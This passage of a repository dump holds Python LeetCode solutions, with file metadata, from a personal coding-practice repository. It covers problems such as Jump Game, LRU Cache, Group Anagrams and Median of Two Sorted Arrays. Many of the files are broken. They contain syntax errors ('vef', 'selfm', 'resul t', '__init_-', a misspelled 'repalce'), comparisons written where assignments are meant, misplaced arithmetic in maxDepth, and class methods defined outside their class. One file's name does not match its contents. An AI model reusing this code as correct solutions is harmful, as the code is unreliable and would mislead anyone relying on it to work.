\"*\":\n\t\t\t\tdp[m][i] = dp[m][i + 1]\n\t\t\telse:\n\t\t\t\tdp[m][i] = False\n\n\t\tfor i in range(m - 1, -1, -1):\n\t\t\tfor j in range(n - 1, -1, -1):\n\t\t\t\tif p[j] == \"*\":\n\t\t\t\t\tif j - 1 >= 0 and p[j - 1] != \"*\":\n\t\t\t\t\t\tdp[i][j] = dp[i][j + 1]\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn False\n\n\t\t\t\telif j + 1 < n and p[j + 1] == \"*\":\n\t\t\t\t\tif s[i] == p[j] or p[j] == \".\":\n\t\t\t\t\t\tdp[i][j] = dp[i][j + 2] or dp[i + 1][j] or dp[i + 1][j + 2]\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tdp[i][j] = dp[i][j + 2]\n\t\t\t\telse:\n\t\t\t\t\tif s[i] == p[j] or p[j] == \".\":\n\t\t\t\t\t\tdp[i][j] = dp[i + 1][j + 1]\n\t\t\t\t\telse:\n\t\t\t\t\t\tdp[i][j] = False\n\t\treturn dp[0][0]\n\n" }, { "alpha_fraction": 0.5838509202003479, "alphanum_fraction": 0.6149068474769592, "avg_line_length": 25.5, "blob_id": "2c06e3a5425aca20f73f1397dec967fd1fd4b354", "content_id": "24e7f3e65b8343037c91b530470f1f0094a608ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 38, "num_lines": 6, "path": "/Part1/Sqrt(x).py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef mysqrt(self, x):\n\t\tresult = 1.0\n\t\twhile abs(result * result - x)> 0.1:\n\t\t\tresult = (result + x . result) / 2\n\t\treturn int(result)\n\t\t" }, { "alpha_fraction": 0.6233766078948975, "alphanum_fraction": 0.6406926512718201, "avg_line_length": 18.33333396911621, "blob_id": "31adcf347c557889d2838474df01f4b5f4b40fbb", "content_id": "f5401005b3c28f530299394fe34c97b48f0560d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 33, "num_lines": 12, "path": "/Part3/Jump_Game_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class SOlution(object):\n\tvef jump(self, nums):\n\tlength = len(nums)\n\tcounter = 0\n\tlongest = 0\n\treach = 0\n\tfor i in range(length):\n\t\tif longest < i:\n\t\t\tcounter += 1\n\t\t\tlongest = reach\n\t\treach = max(reach, nums[i] + i)\n\treturn counter" }, { "alpha_fraction": 0.6771004796028137, "alphanum_fraction": 0.6853377223014832, "avg_line_length": 36.8125, "blob_id": "f88131305ae95b61f25118338bb0269fb89e6a58", "content_id": "e21ba460fc77eef9fd9885077292621a7588134f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 607, "license_type": "no_license", "max_line_length": 65, "num_lines": 16, "path": "/Part1/Fraction_To_Recurring_Decimal.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef fractionToDecimal(self, numerator, denominator):\n\t\tsign = '-' if numerator * denominator < 0 else ''\n\t\tquotient, remainder = divmod(abs(numerator), abs(denominator))\n\t\tresult_list = [sign, str(quotient), '.']\n\t\tremainders = []\n\t\twhile remainder not in remainders:\n\t\t\tremainders.append(remainder)\n\t\t\tquotient, remainder = divmod(remainder * 10, abs(denominator))\n\t\t\tresult_list.append(str(quotient))\n\n\t\tidx = remainders.index(remainder)\n\t\tresult_list.insert(idx + 3, '(')\n\t\tresult_list.append(')')\n\t\tresult = ''.join(result_list).repalce('(0)'. '').rstrip('.')\n\t\treturn result\n\n\t" }, { "alpha_fraction": 0.5650887489318848, "alphanum_fraction": 0.5887573957443237, "avg_line_length": 18.941177368164062, "blob_id": "390b7e621a1a0168e660fe4ba3be0a8b99976122", "content_id": "6104ba2312871105fd0d7398f86497d9a0dafd26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 338, "license_type": "no_license", "max_line_length": 39, "num_lines": 17, "path": "/Part3/Longest_Substring_Without_Repeated_Characters.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef lengthofLongestSubstring(self, s):\n\t\tif not s:\n\t\t\treturn 0\n\t\tif len(s) <= 1:\n\t\t\treturn len(s)\n\n\t\tlocations - [ -1 for i in range(256)]\n\t\tindex = -1\n\t\tm = 0\n\t\tfor i, v in enumerate(s):\n\t\t\tif (locations[ord(v)] > index):\n\t\t\t\tindex = locations[ord(v)]\n\n\t\t\tm = max(m, i - index)\n\t\t\tlocation[ord(v)] = i\n\t\treturn m" }, { "alpha_fraction": 0.8266666531562805, "alphanum_fraction": 0.8266666531562805, "avg_line_length": 17.75, "blob_id": "259bf446a69e68344ea25b130b7371cc5f198c59", "content_id": "3d5b6f32ac6e7455a7892e1a16a8a7d7ba334f0c", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "permissive", "max_line_length": 36, "num_lines": 4, "path": "/Part4/README.md", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "# Personal_Work\nUpdating Coding Part\n\nLeet Code Python challenge solutions\n" }, { "alpha_fraction": 0.6183745861053467, "alphanum_fraction": 0.6325088143348694, "avg_line_length": 20.615385055541992, "blob_id": "6137819b03ce2cfc2a15543c25050a8cae950d42", "content_id": "80101205327fd45e81b08e2ad5f719e8c03a14cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 283, "license_type": "no_license", "max_line_length": 46, "num_lines": 13, "path": "/Part1/Jump_Game.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef canJump(self, nums):\n\t\tif not nums:\n\t\t\treturn False\n\t\tlength = len(nums)\n\t\tindex = 0\n\t\tlongest = nums[0]\n\t\twhile index <= longest:\n\t\t\tif longest >= length - 1:\n\t\t\t\treturn True\n\t\t\tlongest = max(longest, index + nums[index])\n\t\t\tindex += 1\n\t\treturn False\n\t\t" }, { "alpha_fraction": 0.5231092572212219, "alphanum_fraction": 0.5525209903717041, "avg_line_length": 17.230770111083984, "blob_id": "d359c21ed32711e4d6433545981e3df990ce0aee", "content_id": "f65b6f4516b56689b8868df28232ca08f6b138e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 476, "license_type": "no_license", "max_line_length": 37, "num_lines": 26, "path": "/Part2/Single_Number_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef singleNumber(self, nums):\n\t\tone, two, three = 0, 0, 0\n\t\tfor num in nums:\n\t\t\tthree = two & num\n\t\t\ttwo = two | one & num\n\t\t\tone = one | num\n\n\n\t\t\tone = one & ~three\n\t\t\ttwo = two & ~three\n\n\t\treturn one\n\n\tdef singleNumber_normal(self, nums):\n\t\tresult = 0\n\t\tfor i in range(32):\n\t\t\tcount = 0\n\t\t\tfor num in nums:\n\t\t\t\tcount += (num >> i) & 1\n\t\t\trem = count % 3\n\t\t\tif i == 31 and rem:\n\t\t\t\tresult -= 1 <<31\n\t\t\telse:\n\t\t\t\tresul t |= rem << i\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5728346705436707, "alphanum_fraction": 0.6299212574958801, "avg_line_length": 24.25, "blob_id": "fb80c698d300de82c64b394f32deeaf25ffe5e8a", "content_id": "242135f2234682561db06676f050976285217063", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 508, "license_type": "no_license", "max_line_length": 156, "num_lines": 20, "path": "/Part2/Scramble_String.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "from collections import defaultdict\n\nclass Solution(object):\n\tdef isScramble(self, s1, s2):\n\t\tif s1 == s2:\n\t\t\treturn True\n\n\t\tcount1 = defaultdict(int)\n\t\tcount2 = defaultdict(int)\n\n\t\tfor e1, e2 in zip(s1, s2):\n\t\t\tcount1[e1] += 1\n\t\t\tcount2[e2] += 1\n\t\tif count1 != count2:\n\t\t\treturn False\n\n\t\tfor i in range(1, len(s1)):\n\t\t\tif self.isScramble(s1[:i], s2[:i]) and self.isScramble(s1[i:], s2[i:]) or self.isScramble(s1[:i], s2[-i:]) and self.isScramble(s1[i:], s2[:len(s2) - i]):\n\t\t\t\treturn True\n\t\treturn False\n\n\t\t" }, { "alpha_fraction": 0.6112852692604065, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 30.299999237060547, "blob_id": "1659ca716a0c988055150b6c3c9984bbe236c0c7", "content_id": "78d20ae5cddcc4c4427f4b16c75bdf155998dbe4", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "permissive", "max_line_length": 39, "num_lines": 10, "path": "/Part4/Two_Sum.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef twoSum(self, nums, target):\n\t\thash_map = {}\n\t\tfor index, value in enumerate(nums):\n\t\t\thash_map[value] = index\n\t\tfor index1, value in enumerate(nums):\n\t\t\tif target - value in hash_map:\n\t\t\t\tindex2 = hash_map[target - value]\n\t\t\t\tif index1 != index2:\n\t\t\t\t\treturn [index1 + 1, index2 + 1]\n\n\t\t\t\t\t" }, { "alpha_fraction": 0.6524559855461121, "alphanum_fraction": 0.6598702669143677, "avg_line_length": 21.93617057800293, "blob_id": "333168fbadf1740ee4e3e714f313f2838fd4e3a9", "content_id": "28e33a241fb005f090f6bb9f732c5e41ee73c1a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1079, "license_type": "no_license", "max_line_length": 60, "num_lines": 47, "path": "/Part2/LRU_Cache.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Node(object):\n\tdef __init__(self, key, value):\n\t\tself.key = key\n\t\tself.val = value\n\t\tself.prev, self.next = None, None\n\ndef __init__(self, capacity):\n\tself.capacity, self.size = capacity, 0\n\tself.dic = {}\n\tself.head, self.tail = self.Node(-1, -1), self.Node(-1, -1)\n\tself.head.next, self.tail.prev = self.tail, self.head\n\ndef _remove(self, node):\n\tnode.prev.next = node.next\n\tnode.next.prev = node.prev\n\tnode.prev, node.next = None, None\n\ndef _insert(selfm node):\n\tnode.prev, node.next = self.head, self.head.next\n\tself.head.next.prev = node\n\tself.head.next = node\n\ndef get(self, key):\n\tif key not in self.dic:\n\t\treturn -1\n\tnode = self.dic[key]\n\tself._remove(node)\n\tself._insert(node)\n\treturn node.value\n\ndef put(self, key, value):\n\tif key in self.dic:\n\t\tnode = self.dic[key]\n\t\tself._remove(node)\n\t\tnode.value = value\n\t\tself._insert(node)\n\n\telse:\n\t\tif self.size == self.capacity:\n\t\t\tdiscard = self.tail.prev\n\t\t\tself._remove(discard)\n\t\t\tdel self.dic[discard.key]\n\t\t\tself.size -= 1\n\t\tnode = self.Node(key, value)\n\t\tself.dic[key] = node\n\t\tself._insert(node)\n\t\tself.size += 1\n\n" }, { "alpha_fraction": 0.5603053569793701, "alphanum_fraction": 0.5938931107521057, "avg_line_length": 20.866666793823242, "blob_id": "200c07efae1417e6c001d2d7adbd2d6e8a4177de", "content_id": "6aa823313f37dd982dfae3191ba89175448b371e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 655, "license_type": "no_license", "max_line_length": 77, "num_lines": 30, "path": "/Part2/Minimum_Window.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "from collections import defaultdict\n\nclass Solution(object):\n\tdef minWindow(self, s, t):\n\t\tMAX_INT = 2147483647\n\t\tstart = end = 0\n\t\tchar_need = defaultdict(int)\n\n\t\tcount_need = len(t)\n\t\tmin_length = MAX_INT\n\t\tmin_start = 0\n\n\t\tfor i in t:\n\t\t\tchar_need[i] += 1\n\n\t\twhile end < len(s):\n\t\t\tif char_need[s[end]] > 0:\n\t\t\t\tcount_need -= 1\n\t\t\tchar_need[s[end]] -= 1\n\t\t\tend += 1\n\t\t\twhile count_need == 0:\n\t\t\t\tif min_length > end - start:\n\t\t\t\t\tmin_length = end -start\n\t\t\t\t\tmin_start = start\n\t\t\t\tchar_need[s[start]] += 1\n\n\t\t\t\tif char_need[s[start]] > 0:\n\t\t\t\t\tcount_need += 1\n\t\t\t\tstart += 1\n\t\treturn \"\" if min_length == MAX_INT else s[min_start:min_start + min_length]" }, { "alpha_fraction": 0.5916442275047302, "alphanum_fraction": 0.6010781526565552, "avg_line_length": 36, "blob_id": "8f5d160a04f86d6470b961679a23937d5dfa0e61", "content_id": "c9d4af81fba8bd8958b901208a6e6ef4a9b33a23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 742, "license_type": "no_license", "max_line_length": 102, "num_lines": 20, "path": "/Part1/Text_Justification.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef fullJustify(self, words, maxWidth):\n\t\tstart = end = 0\n\t\tresult, curr_words_length = [], 0\n\t\tfor i, word in enumerate(words):\n\t\t\tif len(word) + curr_words_length + end - start > maxWidth:\n\t\t\t\tif end - start == 1:\n\t\t\t\t\tresult.append(words[start] + ' ' * (maxWidth - curr_words_length))\n\n\t\t\t\telse:\n\t\t\t\t\ttotal_space = maxWidth - curr_words_length\n\t\t\t\t\tspace, extra = divmod(total_space, end - start - 1)\n\t\t\t\t\tfor j in range(extra):\n\t\t\t\t\t\twords[start + j] += ' '\n\t\t\t\t\tresult.append((' ' * space).join(words[start: end]))\n\t\t\t\tcurr_words_length = 0\n\t\t\t\tstart = end = i\n\t\t\tend += 1\n\t\t\tcurr_words_length += len(word)\n\t\tresult.append(' '.join(words[start:end]) + ' ' * (maxWidth - curr_words_length - (end - start - 1)))\n\t\t" }, { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 22.076923370361328, "blob_id": "f2b39cb66e53d8328f49b7060cef6689dcfc52f1", "content_id": "4adf3cd88697c3da3f151c3165fbcd70a06322c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 299, "license_type": "no_license", "max_line_length": 31, "num_lines": 13, "path": "/Part3/Group_Anagrams.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef groupAnagrams(self, strs):\n\t\tmaps = {}\n\t\tfor i, v in enumerate(strs):\n\t\t\ttarget = \"\".join(sorted(v))\n\t\t\tif target not in map:\n\t\t\t\tmap[target] = [v]\n\t\t\telse:\n\t\t\t\tmap[target].append(v)\n\t\tresult = []\n\t\tfor value in map.values():\n\t\t\tresult += [sorted(value)]\n\t\treturn result" }, { "alpha_fraction": 0.5127636194229126, "alphanum_fraction": 0.5937846899032593, "avg_line_length": 29.066667556762695, "blob_id": "305dfc183eb2fbaee9f85164192b901ae251a96c", "content_id": "37db9ce3e6dd109e2a75efd6aca3711f672538e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 901, "license_type": "no_license", "max_line_length": 77, "num_lines": 30, "path": "/Part2/Median_Of_Two_Sorted_Arrays.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef findMedianSortedArrays(self, nums1, nums2):\n\t\tlength1 = len(nums1)\n\t\tlenght2 = len(nums2)\n\t\tk = (length1 + lenght2) // 2\n\t\tif (length1 + length2) % 2 == 0:\n\t\t\treturn (self.findK(nums1, nums2, k) + self.findK(nums1, nums2, k - 1)) / 2\n\t\telse:\n\t\t\treturn self.findK(nums1, nums2, k)\n\n\tdef findK(self, num1, num2, k):\n\t\tif not num1:\n\t\t\treturn num2[k]\n\t\tif not num2:\n\t\t\treturn num1[k]\n\t\tif k == 0:\n\t\t\treturn min(num1[0], num2[0])\n\n\t\tlength1 = len(num1)\n\t\tlength2 = len(num2)\n\t\tif num1[length1 // 2] > num2[lenght2 // 2]:\n\t\t\tif k > length1 //3 + length2 // 2:\n\t\t\t\treturn self.findK(num1, num2[length2 // 2 + 1:], k - length2 // 2 - 1)\n\t\t\telse:\n\t\t\t\treturn self.findK(num1[:length // 2], num2, k)\n\t\telse:\n\t\t\tif k > length1 // 2 + length2 // 2 :\n\t\t\t\treturn self.findK(num1[length1 // 2 + 1:], num2, k - length1 // 2 - 1)\n\t\t\telse:\n\t\t\t\treturn self.findK(num1, num2[:length2 // 2], k)" }, { "alpha_fraction": 0.6679999828338623, "alphanum_fraction": 0.6759999990463257, "avg_line_length": 21.81818199157715, "blob_id": "6a8c2fddfa073c9baac26c58bfadd17705a1304d", "content_id": "6e0a21ad8c2ecf8d1973adf4fe1e23d907985533", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 69, "num_lines": 11, "path": "/Part3/Maximum_Depth_OF_Binary_Tree.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef maxDepth(self, root):\n\t\tif not root:\n\t\t\treturn 0\n\t\treturn max(self.maxDepth(root.left), self.maxDepth(root.right) + 1)" }, { "alpha_fraction": 0.5019454956054688, "alphanum_fraction": 0.5252918004989624, "avg_line_length": 20.08333396911621, "blob_id": "305fd13e1c23f18419b8868639ae04aa62dfe7b1", "content_id": "cd194c4eee6299ce5f520c68f6aec4859a5ab028", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 257, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/Part1/Word_Break.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef wordBreak(self, s, wordDict):\n\t\tn = len(s)\n\t\tdp = [False] * (n + 1)\n\t\tdp[0] = True\n\n\t\tfor i in range(n):\n\t\t\tfor j in range(i, -1, -1):\n\t\t\t\tif dp[j] and s[j:i + 1] in wordDict:\n\t\t\t\t\tdp[i + 1] = True\n\t\t\t\t\tbreak\n\t\treturn dp[n]\n\n\n\t\t" }, { "alpha_fraction": 0.5588235259056091, "alphanum_fraction": 0.5794117450714111, "avg_line_length": 23.14285659790039, "blob_id": "0ee35d8b3dfd5dec012a2cd759009ba71bf580b1", "content_id": "91963e2712e7532640be6d9381175bee86c438e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 46, "num_lines": 14, "path": "/Part1/Remove_Element.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef removeElement(self, nums, val):\n\t\tleft = 0\n\t\tright = len(nums) - 1\n\t\twhile left <= right:\n\t\t\twhile left <= right and nums[left] != val:\n\t\t\t\tleft += 1\n\t\t\twhile left <= right and nums[right] == val:\n\t\t\t\tright -= 1\n\t\t\tif left < right:\n\t\t\t\tnums[left] = nums[right]\n\t\t\t\tleft += 1\n\t\t\t\tright -= 1\n\t\treturn right + 1\n\t\t" }, { "alpha_fraction": 0.5787171721458435, "alphanum_fraction": 0.5874635577201843, "avg_line_length": 28.869565963745117, "blob_id": "7a2213d9623792c9963cdf6ed9188f25f6451901", "content_id": "6d9d4dc1fafca059ddbc6b8b729e113f280fc986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 686, "license_type": "no_license", "max_line_length": 84, "num_lines": 23, "path": "/Part2/4Sum.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef fourSum(self, nums, target):\n\t\tif len(nums) < 4:\n\t\t\treturn []\n\t\tresult = set()\n\t\tsumsIndexs = {}\n\n\t\tfor i in range(len(nums)):\n\t\t\tfor j in range(i + 1, len(nums)):\n\t\t\t\tif nums[i] + nums[j] in sumsIndexs:\n\t\t\t\t\tsumsIndexs[nums[i] + nums[j]]. append((i, j))\n\t\t\t\telse:\n\t\t\t\t\tsumsIndexs[nums[i] + nums[j]] == [(i, j)]\n\n\t\tfor i in range(len(nums)):\n\t\t\tfor j in range(i + 1, len(nums)):\n\t\t\t\tsumNeeded = target - (nums[i] + nums[j])\n\t\t\t\tif sumNeeded in sumsIndexs:\n\t\t\t\t\tfor index in sumsIndexs[sumNeeded]:\n\t\t\t\t\t\tif index[0] > j:\n\t\t\t\t\t\t\tresult.add(tuple(sorted([nums[i], nums[j], nums[index[0]], nums[index[1]]])))\n\t\tresult = [list(l) for l in result]\n\t\treturn result" }, { "alpha_fraction": 0.5966851115226746, "alphanum_fraction": 0.5966851115226746, "avg_line_length": 16.14285659790039, "blob_id": "c47454e4e3edb46cd158d3b0c1efb9b9ac398c5b", "content_id": "838d586e7bdafd2406e6c7fd7108fd44312ef0b1", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "permissive", "max_line_length": 36, "num_lines": 21, "path": "/Part4/Binary_tree_inorder_traversal.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef inOrderTransversal(self, root):\n\t\tresult = []\n\t\tstack = []\n\t\tp = root\n\n\t\twhile p or stack:\n\t\t\twhile p:\n\t\t\t\tstack.append(p)\n\t\t\t\tp = p.left\n\t\t\tif stack:\n\t\t\t\tp = stack.pop()\n\t\t\t\tresult.append(p.val)\n\t\t\t\tp = p.right\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.637155294418335, "alphanum_fraction": 0.6473149657249451, "avg_line_length": 20.40625, "blob_id": "f04375b83a03dc8ee0492660ddc4e7b64981dfac", "content_id": "ad81d594fc8a4248cd74a8fc1b5221d54124a378", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "permissive", "max_line_length": 52, "num_lines": 32, "path": "/Part4/Convert_Sorted_List_To_Binary_Search_Tree.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass TreeNode(object):\n\tdef __init_-(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\t\n\tdef sortedListToBST(self, head):\n\t\tnode, length = head, 0\n\t\twhile node:\n\t\t\tnode = node.next\n\t\t\tlength += 1\n\t\tself.curr = head\n\t\treturn self._sortedListToBST(0, length - 1)\n\n\tdef _sortedListToBST(self, left, right):\n\t\tif left > right:\n\t\t\treturn None\n\n\t\tmid = (left + right) // 2\n\t\tleft = self._sortedListToBST(left, mid - 1)\n\t\troot = TreeNode(self.curr.val)\n\t\troot.left = left\n\t\tself.curr = self.curr.next\n\t\troot.right = self._sortedListToBST(mid + 1, right)\n\t\treturn root\n\t\t\n\n" }, { "alpha_fraction": 0.4795081913471222, "alphanum_fraction": 0.506147563457489, "avg_line_length": 20.130434036254883, "blob_id": "bdd568a58972e537649739ea9cabdc98a2d20f3f", "content_id": "6a2efa202d689b7fa98c9be90005ec72f779b3ff", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 488, "license_type": "permissive", "max_line_length": 37, "num_lines": 23, "path": "/Part4/Zig_Zag_Conversion.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef convert(self, s, numRows):\n\t\tif numRows <= 1:\n\t\t\treturn s\n\t\tresult = ''\n\t\tindex = 0\n\t\tn = len(s)\n\t\tfor i in range(0, numRows):\n\t\t\tif i == 0 or i == numRows - 1:\n\t\t\t\twhile index < n:\n\t\t\t\t\tresult += s[index]\n\t\t\t\t\tindex += 2 * numRows - 2\n\t\t\t\tindex = i + 1\n\t\t\telse:\n\t\t\t\twhile index < n :\n\t\t\t\t\tresult += s[index]\n\t\t\t\t\tindex += 2 * numRows - 2 * i - 2\n\t\t\t\t\tif index >= n:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tresult += s[index]\n\t\t\t\t\tindex += 2 * i\n\t\t\t\tindex = i + 1\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5761396884918213, "alphanum_fraction": 0.6314257979393005, "avg_line_length": 18.433961868286133, "blob_id": "87c6e2b4af8a4507ab52b9ad844fadce26389969", "content_id": "947130919fc6586cd807d99077114d83cf60f3d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1031, "license_type": "no_license", "max_line_length": 86, "num_lines": 53, "path": "/Part3/Iteration.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "# Printing all the numbers\n\na_2d = [[1,2,3],[5,6,7]]\nprint (a_2d)\n\n# To replace the element\n\nb_2d = [[1,2,3],[5,6,7]]\nb_2d[1][1] = 99\nprint (b_2d)\n\n#Iterate Over c_2d And Print all the syntax\n\nc_2d = [[1,2,3],[5,6,7]]\nfor i in c_2d:\n\tfor item in i:\n\t\tprint(item)\n\n#Print all the numbers using range of\nd_2d = [[1,2,3],[5,6,7]]\nfor i in range(d_2d):\n\tfor j in range(d_2d[i]):\n\t\tprint(d_2d[i][j])\n\n#Adding the numbers in diagnoal\ndef diagnoal_sum():\n\tgiven2_d = [[1,2,3],[4,5,6],[7,8,9]]\n\ttotal = 0\n\tfor i in range (len(given2_d):\n\t\ttotal += given2_d[i][i]\n\treturn (total)\n\n\n#Sample Interview Question\n#Chess Board any of the rookies can able to attack any one horizantally and Vertically\ndef rook_safe(chessboard):\n\tn = len(chessboard)\n\t\n\tfor row_i in range(n):\n\t\trow_count =0\n\t\tfor col_i in range(n):\n\t\t\trow_count +=chessboard[row_i][col_i]\n\t\tif row_count > 1:\n\t\t\treturn False\n\n\tfor col_i in range(n):\n\t\tcol_count =0\n\t\tfor col_i in range(n):\n\t\t\tcol_count +=chessboard[row_i][col_i]\n\t\tif col_count>1:\n\t\t\treturn False\n\n\treturn True\n\n" }, { "alpha_fraction": 0.6326530575752258, "alphanum_fraction": 0.6530612111091614, "avg_line_length": 20.61111068725586, "blob_id": "3693a33c58410d3504001621054b4ddbcaa0a89c", "content_id": "dfc8a11ce46c0962588bdd661325b098ab08d76b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 37, "num_lines": 18, "path": "/Part2/Swap_Node_In_Paris.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass Solution(object):\n\tdef swapParis(self, head):\n\t\tprev = ListNode(-1)\n\t\tprev.next = head\n\t\ttemp = prev\n\t\twhile temp.next and temp.next.next:\n\t\t\tnode1 = temp.next\n\t\t\tnode2 = temp.next.next\n\t\t\ttemp.next = node2\n\t\t\tnode1.next = node2.next\n\t\t\tnode2.next = node1\n\t\t\ttemp = temp.next.next\n\t\treturn prev.next\n\t\t\n" }, { "alpha_fraction": 0.5209125280380249, "alphanum_fraction": 0.5665399432182312, "avg_line_length": 19.076923370361328, "blob_id": "98ec6c64c0f6711225cd0ec422543b9ffefe7523", "content_id": "afb5217bd7da025048f0a329b71cb88b3af1b168", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "permissive", "max_line_length": 43, "num_lines": 13, "path": "/Part4/Minimum_Path_Sum_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef plusOne(self, digits):\n\t\tcarry = 1\n\t\tfor i in range(len(digits) - 1, -1, -1):\n\t\t\tdigits[i] += carry\n\t\t\tif digits[i] < 10:\n\t\t\t\tcarry = 0\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tdigits[i] -= 10\n\t\tif carry == 1:\n\t\t\tdigits.insert(0, 1)\n\t\treturn digits\n\t\t" }, { "alpha_fraction": 0.6427184343338013, "alphanum_fraction": 0.6466019153594971, "avg_line_length": 23.571428298950195, "blob_id": "1400c2d7026cf0bdd6e5cbd12799844398e7b024", "content_id": "6c49c866a1cbe899395572797f5c8546cb1b4fb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 515, "license_type": "no_license", "max_line_length": 42, "num_lines": 21, "path": "/Part3/Populating_Next_Right_Pointers_In_Each_Node.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeLinkNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.next = None\nclass Solution(object):\n\tdef connect(self, root):\n\t\tif not root:\n\t\t\treturn\n\t\tcurrent_level = [root]\n\t\twhile current_level:\n\t\t\tnext_level = []\n\t\t\tfor node in current_level:\n\t\t\t\tif node.left:\n\t\t\t\t\tnext_level.append(node.left)\n\t\t\t\tif node.right:\n\t\t\t\t\tnext_level.append(node.right)\n\t\t\tfor i in range(len(next_level) - 1):\n\t\t\t\tnext_level[i].next = next_level[i + 1]\n\t\t\tcurrent_level = next_level" }, { "alpha_fraction": 0.6567164063453674, "alphanum_fraction": 0.6660447716712952, "avg_line_length": 24.428571701049805, "blob_id": "82c1a1f2036b7c8624fa46fac9fd99e2b7cc45ef", "content_id": 